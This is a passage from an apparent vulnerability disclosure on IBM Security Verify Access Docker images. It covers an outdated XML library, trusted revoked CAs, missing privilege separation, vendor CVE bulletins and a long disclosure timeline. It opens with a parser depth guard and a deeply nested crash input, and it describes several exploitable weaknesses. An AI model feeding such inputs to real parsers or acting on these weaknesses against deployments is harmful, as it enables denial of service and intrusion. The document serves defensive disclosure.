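    This mimics the idea of the DeepRecursion check added to yaml-cpp
    in PR #807: depth is counted on every recursive descent and the
    parse fails cleanly instead of overflowing the stack.
    """
    if depth > MAX_DEPTH:
        raise DeepRecursionError("document nested too deeply")
    items = []
    while pos < len(text):
        ch = text[pos]
        if ch == "[":
            child, pos = parse_flow_sequence(text, pos + 1, depth + 1)
            items.append(child)
        elif ch == "]":
            return items, pos + 1
        else:
            pos += 1
    return items, pos

payload = "[" * 200  # far beyond the guard
# parse_flow_sequence(payload) now raises DeepRecursionError instead of
# crashing the process with a stack overflow.
```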
libtivsec_xml4c.so - outdated Xerces-C library
This library (8b3d3d2dcb1152966d097e91e08fa1dc4300f3653f1c264eeecaf20bb1550832) is located in /usr/lib64/libtivsec_xml4c.so and /opt/ibm/Tivoli/SecUtilities/lib/libtivsec_xml4c.so and uses outdated code from XML4C 5.5.0 that includes a version of Xerces-C (XML4C no longer exists and its latest release appears to be from 2007-2008).
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
This version appears to be quite outdated and is likely vulnerable to known CVEs (https://xerces.apache.org/xerces-c/secadv.html).
Details - Outdated and untrusted CAs used in the Docker images
It was observed that the Docker images trust invalid Certificate Authorities (CAs).
Using the Paranoia program, we can list the invalid, expired and revoked CAs that are trusted inside the 4 Docker images.
It appears that these 4 Docker images trust several invalid, revoked or distrusted CAs.
Results for ibmcom/verify-access:10.0.4.0:
kali-docker# paranoia inspect ibmcom/verify-access:10.0.4.0
Certificate CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=VeriSign Trust Network+OU=(c) 2006 VeriSign\, Inc. - For authorized use only,O=VeriSign\, Inc.,C=US removed from Mozilla trust store, no reason given
Certificate CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US expires soon ( expires on 2023-03-08T12:00:00Z, 19 weeks 2 days until expiry)
Certificate CN=Test CA,O=genua mbh expired ( expired on 2014-10-23T08:22:40Z, 8 years 3 days since expiry)
Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon.
Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry) removed from Mozilla trust store, no reason given
Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)
Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: Ownership transferred to GTS: https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281
Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR removed from Mozilla trust store, no reason given
Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)
Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59 https://bugzilla.mozilla.org/show_bug.cgi?id=1410277
Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: Ownership transferred to GTS: https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281
Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR removed from Mozilla trust store, no reason given
Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59 https://bugzilla.mozilla.org/show_bug.cgi?id=1410277
Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon.
Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry) removed from Mozilla trust store, no reason given
Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)
Certificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)
Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: Ownership transferred to GTS: https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281
Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR removed from Mozilla trust store, no reason given
Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)
Certificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)
Found 395 certificates total, of which 21 had issues
Results for:
- ibmcom/verify-access-runtime:10.0.4.0
- ibmcom/verify-access-wrp:10.0.4.0
- ibmcom/verify-access-dsc:10.0.4.0
kali-docker# paranoia inspect ibmcom/verify-access-runtime:10.0.4.0
Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon.
Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry) removed from Mozilla trust store, no reason given
Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)
Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: Ownership transferred to GTS: https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281
Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR removed from Mozilla trust store, no reason given
Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)
Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59 https://bugzilla.mozilla.org/show_bug.cgi?id=1410277
Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: Ownership transferred to GTS: https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281
Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR removed from Mozilla trust store, no reason given
Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59 https://bugzilla.mozilla.org/show_bug.cgi?id=1410277
Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon.
Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry) removed from Mozilla trust store, no reason given
Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)
Certificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)
Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry) removed from Mozilla trust store, comments: Ownership transferred to GTS: https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281
Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR removed from Mozilla trust store, no reason given
Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)
Certificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)
Found 374 certificates total, of which 18 had issues
Communications in the ISVA platform use SSL/TLS, with trust entirely based on the underlying CAs. Some CAs have been revoked and cannot be trusted anymore.
The presence of revoked and expired CAs also shows that the security of the Docker images leaves much to be desired.
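The core of the expiry check performed by Paranoia is simple to reproduce. A minimal sketch below, with the certificate data hard-coded for illustration (the first two notAfter dates are taken from the output above; the ISRG Root X1 entry is included only as a non-expired example):

```python
from datetime import datetime, timezone

# (CN, notAfter) pairs; the first two come from the Paranoia output above.
TRUSTED_CAS = [
    ("DST Root CA X3", datetime(2021, 9, 30, 14, 1, 15, tzinfo=timezone.utc)),
    ("Cybertrust Global Root", datetime(2021, 12, 15, 8, 0, 0, tzinfo=timezone.utc)),
    ("ISRG Root X1", datetime(2035, 6, 4, 11, 4, 38, tzinfo=timezone.utc)),
]

def expired_cas(now: datetime) -> list:
    """Return the CNs of trusted CAs whose notAfter date has passed."""
    return [cn for cn, not_after in TRUSTED_CAS if not_after <= now]

# Evaluated at the time of the assessment (October 2022):
print(expired_cas(datetime(2022, 10, 23, tzinfo=timezone.utc)))
# → ['DST Root CA X3', 'Cybertrust Global Root']
```

A real implementation would parse the notAfter field out of the PEM bundle shipped in the image instead of using hard-coded dates.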
Details - Lack of privilege separation in Docker instances
It was observed that the Docker images do not implement privilege separation. Privilege separation is a software-based implementation of the principle of least privilege.
Dynamic analysis shows that the ibmcom/verify-access-wrp:10.0.4.0, ibmcom/verify-access:10.0.4.0, and ibmcom/verify-access-runtime Docker images do not correctly implement privilege separation.
Processes running inside the ibmcom/verify-access:10.0.4.0 Docker image:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
isam 1 0.0 0.0 12060 2812 ? Ss Oct21 0:00 /bin/sh /sbin/bootstrap.sh
isam 312 0.0 0.0 24532 56 ? Ss Oct21 0:00 /usr/sbin/mesa_crashd
isam 314 0.1 0.0 24568 2056 ? R Oct21 6:20 /usr/sbin/mesa_crashd
isam 318 0.0 0.0 69160 2732 ? Ss Oct21 0:00 /usr/sbin/mesa_syslogd
isam 322 0.0 0.0 69224 2164 ? S Oct21 0:02 /usr/sbin/mesa_syslogd
isam 399 0.0 0.0 102760 2740 ? Ss Oct21 0:00 /usr/sbin/mesa_eventsd -m 1000
isam 400 0.0 0.1 711216 8276 ? Sl Oct21 0:00 /usr/sbin/mesa_eventsd -m 1000
isam 747 0.0 0.0 270992 7452 ? Ssl Oct21 0:06 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap
isam 756 0.0 0.0 271124 7308 ? Ssl Oct21 0:06 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground
isam 807 0.0 0.0 71488 3084 ? Ss Oct21 0:00 /usr/sbin/iss-lum
isam 808 0.0 0.5 343920 42140 ? Sl Oct21 0:00 /usr/sbin/iss-lum
isam 833 0.0 0.0 128400 5140 ? Ssl Oct21 0:00 /usr/sbin/rsyslogd
isam 873 0.0 0.0 273920 7080 ? Ssl Oct21 0:06 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground
isam 879 1.5 0.5 563872 42292 ? Sl Oct21 71:40 wga_notifications -foreground
isam 892 0.0 0.0 12060 1804 ? S Oct21 0:00 /bin/sh /sbin/bootstrap.sh
isam 895 0.0 0.0 23068 1256 ? S Oct21 0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log
isam 573957 0.0 0.0 47620 3696 pts/0 Rs+ 16:53 0:00 ps -aux
isam 573963 0.0 0.0 11928 2852 ? S 16:53 0:00 sh -c ls /var/support/core_*.* | wc -l
pgresql 434 0.0 0.2 188380 17492 ? Ss Oct21 0:06 /usr/bin/postgres -D /var/postgresql/config/data
pgresql 435 0.0 0.0 138892 2960 ? Ss Oct21 0:00 postgres: logger
pgresql 446 0.0 0.0 188380 2696 ? Ss Oct21 0:00 postgres: checkpointer
pgresql 447 0.0 0.0 188516 4676 ? Ss Oct21 0:03 postgres: background writer
pgresql 448 0.0 0.0 188380 5148 ? Ss Oct21 0:03 postgres: walwriter
pgresql 449 0.0 0.0 189112 5312 ? Ss Oct21 0:04 postgres: autovacuum launcher
pgresql 450 0.0 0.0 139024 3016 ? Ss Oct21 0:15 postgres: stats collector
pgresql 451 0.0 0.0 188916 5492 ? Ss Oct21 0:00 postgres: logical replication launcher
www-data 547 0.3 6.2 4925056 499744 ? SLl Oct21 18:57 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/de
ivmgr 761 0.0 0.5 873712 44896 ? Sl Oct21 0:04 /opt/PolicyDirector/bin/pdmgrd -foreground
ivmgr 863 0.0 0.1 276544 8440 ? Sl Oct21 0:00 /usr/sbin/wga_servertaskd
ldap 752 0.0 10.3 1314228 822572 ? Sl Oct21 0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap
root 813 0.0 0.0 41984 3528 ? Ss Oct21 0:01 /usr/sbin/crond
root 862 0.0 0.0 174348 2828 ? Ss Oct21 0:00 /usr/sbin/wga_servertaskd
Some processes run as isam. For example, the rsyslogd process runs as isam. If a program running as isam is compromised inside an instance, then all the programs running as isam are also compromised.
Processes running inside the ibmcom/verify-access-wrp:10.0.4.0 Docker image:
PID USER TIME COMMAND
1 isam 9:42 /opt/pdweb/bin/webseald -foreground -noenv -config etc/webseald-login-internal.conf
32 isam 0:02 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0
Both processes run as isam.
Processes running inside the ibmcom/verify-access-runtime:10.0.4.0 Docker image:
PID USER TIME COMMAND
1 isam 1h18 /opt/java/jre/bin/java -javaagent:/opt/ibm/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/rtprofile -Xms512m -Xmx2048m -Dcom.sun.security.enableCRLDP=true -Dsun.net.inetaddr.ttl=30 -Dhttps
38 isam 0:00 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0
63 isam 0:04 /usr/bin/postgres -D /var/postgresql/config/data
64 isam 0:00 postgres: logger
66 isam 0:00 postgres: checkpointer
67 isam 0:00 postgres: background writer
68 isam 0:00 postgres: walwriter
69 isam 0:01 postgres: autovacuum launcher
70 isam 0:05 postgres: stats collector
71 isam 0:00 postgres: logical replication launcher
37169 isam 0:00 bash
37186 isam 0:00 ps -a
In the ibmcom/verify-access-runtime instance, we can confirm the postgres daemon is running. We can also confirm a complete lack of privilege separation: everything is running as isam.
If a program running as isam is compromised inside an instance, then all the programs running as isam are also compromised.
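This single-user pattern is easy to spot mechanically. A small sketch that groups a ps listing by user (the input below is abridged from the ibmcom/verify-access-wrp:10.0.4.0 listing above; the helper name is an illustration, not part of any IBM tooling):

```python
from collections import Counter

def users_in_ps(ps_output: str) -> Counter:
    """Count processes per user in `ps`-style output (user in column 1).

    A container in which security-sensitive daemons (reverse proxy,
    LDAP, syslog, watchdogs) all map onto a single user offers no
    privilege separation: compromising one process compromises all of
    them.
    """
    counts = Counter()
    for line in ps_output.strip().splitlines():
        user = line.split()[0]
        counts[user] += 1
    return counts

# Abridged from the ibmcom/verify-access-wrp:10.0.4.0 listing above:
listing = """\
isam 1 /opt/pdweb/bin/webseald -foreground
isam 32 slapd -4 -f /etc/openldap/slapd.conf
"""
print(users_in_ps(listing))  # → Counter({'isam': 2})
```

A healthy layout would instead show distinct users per daemon, as the dedicated pgresql, ldap and ivmgr accounts do in the ibmcom/verify-access image.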
Vendor Response
IBM provided several security bulletins:
Security Bulletin: IBM Security Verify Access is vulnerable to multiple Security Vulnerabilities - https://www.ibm.com/support/pages/node/7158790:
- CVE-2023-38371: IBM Security Access Manager uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.
- CVE-2024-35137: IBM Security Access Manager Appliance could allow a local user to possibly elevate their privileges due to sensitive configuration information being exposed.
- CVE-2024-35139: IBM Security Verify Access could allow a local user to obtain sensitive information from the container due to incorrect default permissions.
- CVE-2023-30998: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls.
- CVE-2023-30997: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls.
- CVE-2023-38368: IBM Security Access Manager Container could disclose sensitive information to a local user due to improper permission controls.
- CVE-2023-38370: IBM Security Access Manager Container, under certain configurations, could allow a user on the network to install malicious packages.
Security Bulletin: Security Vulnerabilities discovered in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7145400:
- CVE-2024-25027: IBM Security Verify Access could disclose sensitive snapshot information due to missing encryption.
Security Bulletin: Multiple Security Vulnerabilities were identified in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7106586:
- CVE-2023-31003: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain root access due to improper access controls.
- CVE-2023-31001: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) temporarily stores sensitive information in files that could be accessed by a local user.
- CVE-2023-38267: IBM Security Access Manager Appliance (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain sensitive configuration information.
- CVE-2023-31005: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a local user to escalate their privileges due to an improper security configuration.
- CVE-2023-30999: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow an attacker to cause a denial of service due to uncontrolled resource consumption.
- CVE-2023-43016: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote user to log into the server due to a user account with an empty password.
- CVE-2023-32327: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.
- CVE-2023-32329: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a user to download files from an incorrect repository due to improper file validation.
- CVE-2023-31004: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote attacker to gain access to the underlying system using man in the middle techniques.
- CVE-2023-31006: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to a denial of service attacks on the DSC server.
- CVE-2023-32328: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure protocols in some instances that could allow an attacker on the network to take control of the server.
- CVE-2023-32330: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure calls that could allow an attacker on the network to take control of the server.
- CVE-2023-43017: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 could allow a privileged user to install a configuration file that could allow remote access.
- CVE-2023-31002: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 temporarily stores sensitive information in files that could be accessed by a local user.
- CVE-2023-38369: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 does not require that docker images should have strong passwords by default, which makes it easier for attackers to compromise user accounts.
Security Bulletin: Multiple Security Vulnerabilities were discovered in IBM Security Verify Access Container (CVE-2024-35140, CVE-2024-35141, CVE-2024-35142) - https://www.ibm.com/support/pages/node/7155356:
- CVE-2024-35140: IBM Security Verify Access could allow a local user to escalate their privileges due to improper certificate validation.
- CVE-2024-35141: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges.
- CVE-2024-35142: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges.
Report Timeline
- October 2022: Security assessment performed on IBM Security Verify Access.
- Feb 12, 2023: A complete report was sent to IBM.
- Feb 13, 2023: IBM acknowledged receipt of the security assessment and said that scanning tools usually report many issues, so I had to check the status of the detected CVEs on Red Hat's web pages and create an issue for each CVE.
- Feb 13, 2023: Replied to IBM saying that the security assessment was not done using a scanner.
- Feb 14, 2023: Asked for an update.
- Feb 14, 2023: IBM confirmed that the report was shared with L3 and "IBM hacking team".
- Feb 22, 2023: IBM said they were still assessing the report.
- Mar 13, 2023: An additional report on ibmsecurity was sent to IBM.
- Mar 13, 2023: IBM confirmed that the second report was shared with L3 team.
- Mar 15, 2023: IBM wanted to organize a meeting about the findings.
- Mar 15, 2023: I replied that I would like to have a written feedback for each reported vulnerability in order to have constructive discussion.
- Apr 4, 2023: I asked IBM again to confirm the vulnerabilities.
- Apr 5, 2023: IBM shared the analysis (VulnerabilityResponse.xlsx), confirming several vulnerabilities.
- Apr 11, 2023: I provided my comments (VulnerabilityResponse-comments-Pierre.xlsx) and asked to organize a meeting.
- Apr 11, 2023: IBM confirmed a meeting is possible.
- Apr 18, 2023: I asked to organize a meeting on Apr 19, 2023.
- Apr 18, 2023: IBM confirmed a meeting is possible.
- Apr 19, 2023: I asked to have a meeting where every party (dev team, support and myself) can be present.
- Apr 19, 2023: IBM confirmed a meeting would take place on Apr 20, 2023.
- Apr 20, 2023: Meeting with IBM regarding ISVA. IBM confirmed they would recheck some of the issues and would provide CVEs for the vulnerabilities.
- Apr 23, 2023: I asked to have a second meeting about ibmsecurity.
- Apr 23, 2023: IBM confirmed they will organize a meeting on ibmsecurity.
- Apr 24, 2023: I asked the timeline to get security patches.
- Apr 24, 2023: IBM confirmed there was no ETA for security patches.
- Apr 27, 2023: Meeting with IBM regarding ibmsecurity. IBM confirmed they will fix all the issues.
- May 10, 2023: I asked for CVE identifiers to track the vulnerabilities.
- May 11, 2023: IBM said that PSIRT records have been opened and the scoring is in progress.
- May 15, 2023: I reached IBM because I found a CVE (CVE-2023-25927) and a security bulletin likely corresponding to a vulnerability I reported, thanks to @CVEnew on Twitter: https://www.ibm.com/support/pages/node/6989653. I asked if this was one of the reported vulnerabilities.
- Jul 7, 2023: IBM said the dev team was still working on the final list of issues and that everything would be fixed in the 10.0.7 release.
- Jul 10, 2023: I asked when the 10.0.7 release would be available. I asked again more details about the previous advisory.
- Jul 11, 2023: IBM said that the 10.0.7 release would be published on Dec 23, 2023. Regarding the CVEs, IBM replied they would need to discuss with the dev team.
- Jul 12, 2023: I asked IBM to confirm if CVE-2023-25927 was one of the reported vulnerabilities.
- Jul 12, 2023: IBM said that they do not credit security researchers.
- Jul 13, 2023: I provided several IBM security bulletins where security researchers were credited, e.g. https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430.
- Jul 14, 2023: IBM confirmed that they would forward the information to L3 team and asked what I would want to do with this case.
- Jul 14, 2023: I said that (1) I was still waiting for information about CVE-2023-25927, (2) I did not have any information regarding security patches for ibmsecurity and (3) I asked IBM to provide me with the final list of vulnerabilities that would be patched in the 10.0.7. Since the list of confirmed vulnerabilities was quite long, I wanted to confirm that nothing was missed.
- Jul 28, 2023: IBM said that they did not know if CVE-2023-25927 is one of the reported vulnerabilities and in any case, it is impossible to edit the security bulletin and give credits.
- Aug 16, 2023: IBM asked if additional assistance was required [NB: IBM likely wanted to close this ticket while no security patches were published].
- Aug 17, 2023: I asked again information about ibmsecurity and CVE-2023-25927.
- Oct 20, 2023: IBM said they were still analysing the requests (final list of patched vulnerabilities, security patches for ibmsecurity and status of CVE-2023-25927).
- Oct 25, 2023: IBM asked to organize a meeting.
- Oct 25, 2023: I replied that I was still waiting for the final list of vulnerabilities that would be fixed in version 10.0.7. There was also no information regarding security patches for ibmsecurity.
- Oct 25, 2023: IBM replied they wanted to discuss the vulnerabilities in a meeting.
- Oct 29, 2023: IBM asked to organize a meeting again.
- Oct 30, 2023: I accepted the meeting and I asked IBM to provide the list of vulnerabilities that would be patched with their current status. I also asked the status of ibmsecurity.
- Oct 30, 2023: IBM asked to have a meeting on Nov 7, 2023.
- Nov 2, 2023: I confirmed my presence to the meeting.
- Nov 5, 2023: IBM confirmed the meeting.
- Nov 7, 2023: Meeting with IBM. IBM provided me with a new report containing new feedback for several vulnerabilities. IBM also confirmed that several vulnerabilities would be patched in 2024 and ibmsecurity would be patched in December 2023. IBM asked me to review a specific vulnerability that appears to be invalid (V-[REDACTED] - Insecure SSLv3 connections to the DSC servers).
- Nov 21, 2023: IBM asked me to review the new report shared by IBM.
- Nov 28, 2023: IBM asked for updates.
- Dec 4, 2023: I answered that I no longer had access to the test infrastructure and IBM had to wait for my analysis until I regained access to it.
- Dec 4, 2023: IBM asked me to check the vulnerabilities as soon as possible.
- Dec 21, 2023: I got access to a test infrastructure and reviewed some vulnerabilities.
- Dec 21, 2023: I sent a new analysis to IBM, containing details of 4 vulnerabilities.
- Dec 27, 2023: IBM confirmed the reception of the new analysis.
- Jan 15, 2024: IBM asked me to update ISVA and recheck all the vulnerabilities.
- Jan 16, 2024: I asked IBM if ibmsecurity was also patched.
- Jan 16, 2024: IBM confirmed that a new case must be opened for ibmsecurity to get security patches(!).
- Jan 22, 2024: IBM wanted to organize a new meeting.
- Jan 22, 2024: I replied that I failed to understand the issue with the ibmsecurity library and that I had a written confirmation by IBM that security patches would be provided. The vulnerabilities found in ibmsecurity were reported in March 2023 (10 months ago).
- Jan 22, 2024: I informed IBM that I discovered(!) a new security bulletin thanks to @CVEnew: https://www.ibm.com/support/pages/node/7106586, but only 15 vulnerabilities were listed instead of the 35 vulnerabilities confirmed by IBM. I asked IBM to clarify the situation as it looked like less than half of vulnerabilities were indeed patched.
- Jan 24, 2024: IBM created a new case for ibmsecurity.
- Jan 29, 2024: IBM confirmed that 5 vulnerabilities had not been patched in the latest version (10.0.7).
- Jan 29, 2024: I reached IBM to get the status of 15 unpatched vulnerabilities. I provided the updated analysis to IBM.
- Feb 7, 2024: IBM confirmed that some of the vulnerabilities were "being processed" and that some vulnerabilities had also been silently patched, with no security bulletins published.
- Feb 20, 2024: IBM asked for updates.
- Feb 20, 2024: I asked for the release date of ISVA 10.0.8 and the complete list of vulnerabilities that would be patched in this release.
- Feb 20, 2024: IBM confirmed that the 10.0.8 release would be published in mid-2024.
- Feb 23, 2024: I sent a new vulnerability to IBM "Authentication Bypass on IBM Security Verify Runtime".
- Feb 23, 2024: IBM confirmed the reception of the vulnerability and asked to close the ticket.
- Feb 23, 2024: I said that since some vulnerabilities had not been patched, the ticket must stay open.
- Feb 23, 2024: IBM said that they cannot keep the ticket open and they needed to close it.
- Feb 23, 2024: I explained that the vulnerabilities had been reported over a year earlier, that IBM had confirmed they were not fully fixed in the latest version, and that some vulnerabilities were still under evaluation. I said I would agree to close the ticket if IBM could confirm that all vulnerabilities reported in it had been correctly fixed in the latest version. I also asked IBM to provide the corresponding security bulletins.
- Feb 27, 2024: Regarding the authentication bypass, IBM replied that the runtime was supposed to be in the intranet zone.
